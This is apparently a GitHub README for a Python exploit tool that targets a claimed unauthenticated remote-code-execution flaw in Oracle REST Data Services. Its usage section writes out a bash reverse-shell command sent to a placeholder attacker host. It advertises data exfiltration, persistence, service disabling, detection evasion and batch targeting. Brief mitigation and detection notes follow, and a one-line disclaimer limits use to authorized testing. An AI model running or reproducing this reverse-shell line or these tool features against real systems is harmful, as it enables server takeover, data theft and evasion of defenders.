fangbarristerbar/CVE-2026-46840-ORDS-RCE

# CVE-2026-46840 - Oracle ORDS Unauthenticated RCE via REST Backend ## Overview Remote code execution in Oracle REST Data Services (ORDS) Backend-as-a-Service. Allows unauthenticated attackers to achieve full system takeover over HTTPS. Chainable with scope change to adjacent Oracle products (DB, APEX, Fusion Middleware). Stable on 24.2.0-26.1.0. Bypasses default auth and rate limiting through deserialization path in request processor. ## Affected Versions - Oracle REST Data Services 24.2.0 - 26.1.0 (all platforms) - Confirmed on standalone, WebLogic, Tomcat deployments ## Root Cause Flawed handling of custom REST handler registration combined with unsafe Jackson deserialization in the endpoint router. Attacker-controlled JSON triggers gadget chain leading to arbitrary class loading and command execution under the ORDS process user (usually oracle/tomcat). ## Usage python3 CVE-2026-46840.py -t https://target/ords -c "whoami" python3 CVE-2026-46840.py -t https://target/ords -c "bash -i >& /dev/tcp/attacker/4444 0>&1" **Features:** - Full shell access (reverse TCP, interactive) - Data exfil module (dump schemas via ORDS metadata) - Service disable/persistence options - Proxy + custom User-Agent + TLS fingerprint evasion - Batch mode for multiple targets **Requirements:** - Python 3.9+ - requests, urllib3, colorama ## Mitigation / Workaround Upgrade to 26.2+ immediately. Temporary: restrict /ords/* to trusted IPs only, disable public REST endpoints, monitor for anomalous POSTs to handler registration paths. ## Detection - Unusual 200 responses on /ords/.../metadata-catalog with large JSON - Process creation under ORDS user (cmd.exe, bash, nc) - YARA: strings related to known gadget chains (ObjectMapper, TemplatesImpl) - Network: high volume of POSTs with application/json containing "java." classes ## Disclaimer For authorized penetration testing and red team operations only. ## Contact fangbarristerbar@proton.me